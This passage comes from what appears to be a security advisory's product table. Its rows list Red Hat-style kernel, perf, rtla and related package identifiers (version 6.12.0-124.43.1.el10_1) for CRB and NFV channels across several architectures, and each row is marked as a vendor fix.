| Unresolved product id: CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
